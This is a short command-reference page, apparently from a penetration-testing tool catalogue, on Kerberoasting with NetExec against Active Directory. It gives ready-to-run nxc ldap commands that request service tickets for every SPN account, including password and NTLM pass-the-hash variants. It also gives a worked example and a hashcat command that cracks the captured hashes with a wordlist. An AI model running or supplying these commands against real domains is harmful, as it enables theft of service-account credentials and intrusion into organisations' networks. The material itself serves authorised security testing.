NetExec LDAP Kerberoasting

Request TGS tickets for every account with a SPN and write hashes to a file ready for hashcat (-m 13100). Performed entirely over LDAP+Kerberos in a single command, no separate GetUserSPNs invocation needed.

Tool
nxc
Category
Credential Attacks / Kerberoasting
Platform
linux
Requires
password
Protocols
LDAP, KERBEROS

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

nxc ldap <dc-ip> -u <user> -p <password> --kerberoasting <output.txt>

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

nxc ldap <dc-ip> -u <user> -H <hash> --kerberoasting <output.txt>

Filter by SPN OU requires password

nxc ldap <dc-ip> -u <user> -p <password> --kerberoasting <output.txt> --kdcHost <dc-fqdn>

Examples

nxc ldap 10.10.10.10 -u jdoe -p 'Password123!' --kerberoasting kerb.txt
hashcat -m 13100 kerb.txt /usr/share/wordlists/rockyou.txt

Tags

nxc netexec kerberoasting spn tgs

References